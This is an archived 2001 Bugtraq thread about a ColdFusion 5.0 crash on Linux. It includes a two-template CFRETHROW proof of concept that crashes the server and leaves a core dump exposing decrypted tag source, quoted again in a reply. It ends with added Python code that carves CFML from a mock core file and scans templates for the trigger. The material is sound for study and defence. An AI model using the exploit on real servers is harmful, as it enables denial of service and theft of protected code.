6823158 2001-07-30 22:19 -0500  /82 lines/ Eric Lackey <eric@isdn.net>
Sent by: joel@lysator.liu.se
Imported: 2001-07-31  17:43  by Brevbäraren
External recipient: 'bugtraq@securityfocus.com' <bugtraq@securityfocus.com>
Recipient: Bugtraq (import) <18529>
Subject: cold fusion 5.0 cfrethrow exploit
------------------------------------------------------------
From: Eric Lackey <eric@isdn.net>
To: "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Message-ID: <01B712429915D511803600A0C99AB3A7057FA8@isdnnt02.office.isdn.net>

Vulnerable: 
  Cold Fusion 5.0

Invulnerable:
  Versions of Cold Fusion below 5.0 do not seem to have the same problem.
  
OS:
Only tried on RedHat Linux 2.4.2-2 #1

Allaire reports a Cold Fusion bug that can be found at this address:
http://www.allaire.com/Handlers/index.cfm?ID=17560&Method=Full.  The
bug happens only on Linux.  The text from the bug report is below.

The CFRETHROW tag causes a server restart on Linux.

You can work around this problem by using a CFTHROW tag:
======================================================

Most of the time using the cfrethrow tag in Cold Fusion 5.0 will
cause the server to crash with the message:

Error Diagnostic Information An error occurred while attempting to
establish a connection to the server.

The most likely cause of this problem is that the server is not
currently running. Verify that the server is running and restart it
if necessary.

Unix error number 2 occurred: No such file or directory
 
When this happens, the Cold Fusion server core dumps its memory into
a core file in the /$installdir/coldfusion/logs directory.  By using
the strings command on this file, anyone can see all memory used by
Cold Fusion before the server crashed.  All encrypted and unencrypted
tags that the cf server was using can be seen in clear text in this
core dump.

This vulnerability can be easily reproduced by using Cold Fusion 5 and two
Cold Fusion templates.

Create two files, file1.cfm and file2.cfm.  Within file1.cfm put the
following code.

--------------------------
<CFTRY>
        <CFINCLUDE TEMPLATE="file2.cfm">
        <CFCATCH>
                <!--- Call the encrypted tag or include the template here --->
                <CFRETHROW>
        </CFCATCH>
</CFTRY>
--------------------------

Within file2.cfm put the following code.

--------------------------
<CFTHROW MESSAGE="TEST">
--------------------------

Call any custom tag or template that you want to see in clear text
right after the cfcatch tag.  Then call file1.cfm from a web browser
and the server should crash.  It might take a couple of
refreshes to make the server crash.

This vulnerability will allow anyone to view any Cold Fusion
encrypted tags.  I am aware of another program identified on Bugtraq
that gives anyone the ability to decrypt encrypted tags.  I thought
some might be interested that there is another exploit.

----------------------------
Eric Lackey
ISDN-Net Operations
eric@isdn.net
(6823158) /Eric Lackey <eric@isdn.net>/---(Reflowed)
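The post-crash step the advisory describes, running strings on the core file to read the decrypted template text, as an added example in Python (not code from the advisory or from Allaire). CONSTRUCTED_CORE is a constructed stand-in for a ColdFusion 5 core image: the assumption is that the real core holds the template plaintext verbatim, which is what the advisory reports. The "core" / "core.<pid>" file names and the 0644 mode are assumptions about a typical Linux box; the advisory only says the file lands in the logs directory.

```python
# Added example, not part of the original post.  Carves CFML out of a core
# image the way `strings core | grep '<CF'` would, then audits a logs
# directory for core files that any local user can read.
import os
import re
import resource
import stat
import tempfile

MIN_RUN = 4  # minimum printable run, the same default strings(1) uses

# Constructed core image: binary noise around the plaintext of a template as
# it would sit in the server heap.  The DSN and password are made up.
CONSTRUCTED_CORE = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(256)) * 4
    + b'<CFSET dsn="secret_dsn">\n'
    + b'<CFQUERY NAME="q" DATASOURCE="#dsn#" USERNAME="app" '
      b'PASSWORD="hunter2">SELECT 1</CFQUERY>\n'
    + b"\x00" * 64 + b"ok\x00" + bytes(range(255, 0, -1)) * 4
)

CFML_TAG = re.compile(r"<CF[A-Z]+\b", re.IGNORECASE)


def strings(data, min_run=MIN_RUN):
    """Yield runs of printable ASCII at least min_run long, like strings(1)."""
    pattern = rb"[\x20-\x7e\t]{%d,}" % min_run
    for m in re.finditer(pattern, data):
        yield m.group().decode("ascii")


def carve_cfml(data):
    """Return the printable runs of a core image that contain CFML tags."""
    return [s for s in strings(data) if CFML_TAG.search(s)]


def readable_cores(logdir):
    """Core files under logdir that any local user can read (mode o+r)."""
    found = []
    for name in sorted(os.listdir(logdir)):
        if name == "core" or name.startswith("core."):
            path = os.path.join(logdir, name)
            if os.stat(path).st_mode & stat.S_IROTH:
                found.append(path)
    return found


def core_dumps_disabled():
    """True when this process's soft core-file size limit is zero."""
    soft, _hard = resource.getrlimit(resource.RLIMIT_CORE)
    return soft == 0


def demo():
    """Carve the constructed core, then audit a throwaway 'logs' directory."""
    logdir = tempfile.mkdtemp(prefix="cf-logs-")
    core_path = os.path.join(logdir, "core.1234")  # assumed core.<pid> naming
    with open(core_path, "wb") as fh:
        fh.write(CONSTRUCTED_CORE)
    os.chmod(core_path, 0o644)  # assumed default: readable by every local user
    with open(core_path, "rb") as fh:
        leaked = carve_cfml(fh.read())
    return leaked, readable_cores(logdir)


if __name__ == "__main__":
    leaked, exposed = demo()
    for line in leaked:
        print("leaked:", line)
    for path in exposed:
        print("world-readable core:", path)
    print("core dumps disabled for this process:", core_dumps_disabled())
```

The two checks at the end are the ones that matter for containment: if the server runs with a zero core-file limit the crash still happens but nothing is written to the logs directory, and if a core does get written it should not be readable by the same accounts that can upload templates.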
6823498 2001-07-31 11:39 -0400  /96 lines/ Johnson, Michael <Michael.Johnson@ASTStockplan.com>
Sent by: joel@lysator.liu.se
Imported: 2001-07-31  18:55  by Brevbäraren
External recipient: 'Eric Lackey' <eric@isdn.net>
External recipient: 'bugtraq@securityfocus.com' <bugtraq@securityfocus.com>
Recipient: Bugtraq (import) <18532>
Subject: RE: cold fusion 5.0 cfrethrow exploit
------------------------------------------------------------
From: "Johnson, Michael" <Michael.Johnson@ASTStockplan.com>
To: 'Eric Lackey' <eric@isdn.net>,
 "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Message-ID: <5BA9C874D66DD511860600034708613E6BF794@MAIL01>

Anyone seen a proof of concept for the 'huge Allaire exploit' that
they are telling everyone to put that patch on for? I think it's a
hoax as I have not seen it yet... just some marketing ploy to get
everyone to upgrade...

-MJ?

-----Original Message-----
From: Eric Lackey [mailto:eric@isdn.net]
Sent: Monday, July 30, 2001 11:20 PM
To: 'bugtraq@securityfocus.com'
Subject: cold fusion 5.0 cfrethrow exploit


Vulnerable: 
  Cold Fusion 5.0

Invulnerable:
  Versions of Cold Fusion below 5.0 do not seem to have the same problem.
  
OS:
Only tried on RedHat Linus 2.4.2-2 #1

Allaire reports a Cold Fusion bug that can be found at this address:
http://www.allaire.com/Handlers/index.cfm?ID=17560&Method=Full.  The
bug happens only on Linux.  The text from the bug report is below.

The CFRETHROW tag causes a server restart on Linux.

You can work around this problem by using a CFTHROW tag:
======================================================

Most of the time using the cfrethrow tag in Cold Fusion 5.0 will
cause the server to crash with the message:

Error Diagnostic Information An error occurred while attempting to
establish a connection to the server.

The most likely cause of this problem is that the server is not
currently running. Verify that the server is running and restart it
if necessary.

Unix error number 2 occurred: No such file or directory
 
When this happens, the Cold Fusion server core dumps its memory into
a core file in the /$installdir/coldfusion/logs directory.  By using
the strings command on this file, anyone can see all memory used by
Cold Fusion before the server crashed.  All encrypted and unencrypted
tags that the cf server was using can be seen in clear text in this
core dump.

This vulnerability can be easily reproduced by using Cold Fusion 5 and two
Cold Fusion templates.

Create two files, file1.cfm and file2.cfm.  Within file1.cfm put the
following code.

--------------------------
<CFTRY>
        <CFINCLUDE TEMPLATE="test2.cfm">
        <CFCATCH>
                Call encrypted tag or include template here
                <CFRETHROW>
        </CFCATCH>
</CFTRY>
--------------------------

Within file2.cfm put the following code.

--------------------------
<CFTHROW MESSAGE="TEST">
--------------------------

Call any custom tag or template that you want to see in clear text
right after the cfcatch tag.  Then call test.cfm from a web browser
and the server should then crash.  It might take a couple of
refreshes to make the server crash.

This vulnerability will allow anyone to view any Cold Fusion
encrypted tags.  I am aware of another program identified on Bugtraq
that gives anyone the ability to decrypt encrypted tags.  I thought
some might be interested that there is another exploit.

----------------------------
Eric Lackey
ISDN-Net Operations
eric@isdn.net
(6823498) /Johnson, Michael <Michael.Johnson@ASTStockplan.com>/(Reflowed)
Comment in text 6823965 by Jeff Palmer <scorpio@drkshdw.org>
6823965 2001-07-31 13:39 -0400  /42 lines/ Jeff Palmer <scorpio@drkshdw.org>
Sent by: joel@lysator.liu.se
Imported: 2001-07-31  20:56  by Brevbäraren
External recipient: Johnson, Michael <Michael.Johnson@ASTStockplan.com>
External cc recipient: 'Eric Lackey' <eric@isdn.net>
External cc recipient: 'bugtraq@securityfocus.com' <bugtraq@securityfocus.com>
Recipient: Bugtraq (import) <18537>
Comment on text 6823498 by Johnson, Michael <Michael.Johnson@ASTStockplan.com>
Subject: RE: cold fusion 5.0 cfrethrow exploit
------------------------------------------------------------
From: Jeff Palmer <scorpio@drkshdw.org>
To: "Johnson, Michael" <Michael.Johnson@ASTStockplan.com>
Cc: 'Eric Lackey' <eric@isdn.net>,
 "'bugtraq@securityfocus.com'" <bugtraq@securityfocus.com>
Message-ID: <20010731133031.F3444-100000@jeff.isni.net>

> Anyone seen a proof of concept for the 'huge Allaire exploit' that they are
> telling everyone to put that patch on for? I think it's a hoax as I have not
> seen it yet... just some marketing ploy to get everyone to upgrade...
>
> -MJ?
>

Let me start by saying I am not a ColdFusion programmer or anything
near there.  I do, however, admin 2 RH servers for a company in Texas
that uses CF.

With permission, I have tested this exploit, and have verified it
works as advertised (restarts the CF server on Red Hat Linux).

Once, Apache crashed along with it (signal 11; it dumped core but I
didn't take time to debug why).  Therefore it didn't restart.  It
effectively killed the web server.  (This happened once out of nearly
100 tests, on a devel box.)

There are things you need to consider here.

#1) Most organizations still use the NT version of the server.  So if
this was a marketing ploy, I'd assume Allaire would show an NT
vulnerability?

#2) This exploit only affects systems where users have write access to a
website.  If your server only offers access to developers, you are not
vulnerable.  (Unless you upset one of your employees, in which case you
have many more problems than a simple server restart.)


Regards,

Jeff Palmer
scorpio@drkshdw.org
(6823965) /Jeff Palmer <scorpio@drkshdw.org>/(Reflowed)
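Jeff Palmer's point #2 is that the trigger has to be written into the web root as a .cfm file, which makes the trigger pattern itself (a CFRETHROW nested inside a CFCATCH, exactly the shape of file1.cfm in the advisory) something an administrator can audit for in uploaded templates. The scanner below is an added example in Python, not code from anyone in the thread. The three sample templates are constructed; the regex-based tag matching and comment stripping are assumptions sufficient for CFML of this vintage, not a full CFML parser.

```python
# Added example, not from the thread: audits a web root for the crash trigger
# the advisory describes, a CFRETHROW nested inside a CFCATCH block.
import os
import re
import tempfile

TAG = re.compile(r"<(/?)(CF[A-Z]+)\b", re.IGNORECASE)   # built-in CF tags only
COMMENT = re.compile(r"<!---.*?--->", re.DOTALL)        # CFML comment syntax


def strip_comments(source):
    """Blank CFML comments but keep their newlines so line numbers hold."""
    return COMMENT.sub(lambda m: "\n" * m.group().count("\n"), source)


def find_rethrow_in_catch(source):
    """1-based line numbers of CFRETHROW tags that sit inside a CFCATCH block."""
    hits = []
    depth = 0  # current CFCATCH nesting depth
    text = strip_comments(source)
    for m in TAG.finditer(text):
        closing, name = m.group(1) == "/", m.group(2).upper()
        if name == "CFCATCH":
            depth = max(0, depth - 1) if closing else depth + 1
        elif name == "CFRETHROW" and depth > 0:
            hits.append(text.count("\n", 0, m.start()) + 1)
    return hits


def scan_webroot(root):
    """Map each .cfm template under root (relative path) to its flagged lines."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".cfm"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="latin-1") as fh:
                lines = find_rethrow_in_catch(fh.read())
            if lines:
                report[os.path.relpath(path, root)] = lines
    return report


# Constructed templates: the advisory's trigger, a benign handler that only
# mentions the tag inside a comment, and the thrower the trigger includes.
SAMPLES = {
    "file1.cfm": (
        "<CFTRY>\n"
        '    <CFINCLUDE TEMPLATE="inc/file2.cfm">\n'
        "    <CFCATCH>\n"
        "        <CF_SecretTag>\n"
        "        <CFRETHROW>\n"
        "    </CFCATCH>\n"
        "</CFTRY>\n"
    ),
    "ok.cfm": (
        "<CFTRY>\n"
        '    <CFQUERY NAME="q" DATASOURCE="app">SELECT 1</CFQUERY>\n'
        '    <CFCATCH TYPE="Database">\n'
        "        <!--- no CFRETHROW here: it crashes CF 5 on Linux\n"
        "             and leaves a core file in the logs directory --->\n"
        '        <CFLOG FILE="app" TEXT="#cfcatch.message#">\n'
        "    </CFCATCH>\n"
        "</CFTRY>\n"
    ),
    os.path.join("inc", "file2.cfm"): '<CFTHROW MESSAGE="TEST">\n',
}


def build_sample_webroot():
    """Write the constructed templates into a temporary web root."""
    root = tempfile.mkdtemp(prefix="cf-webroot-")
    for rel, body in SAMPLES.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="latin-1") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for template, lines in scan_webroot(build_sample_webroot()).items():
        print(f"{template}: CFRETHROW inside CFCATCH at line(s) {lines}")
```

Point scan_webroot at the real document root of a CF 5 server on Linux. A hit is not proof of malice, since CFRETHROW is a legitimate tag, but on an unpatched server every such template is a remotely triggerable restart plus a core file, so each one is worth a look, especially under directories that customers or untrusted users can write to.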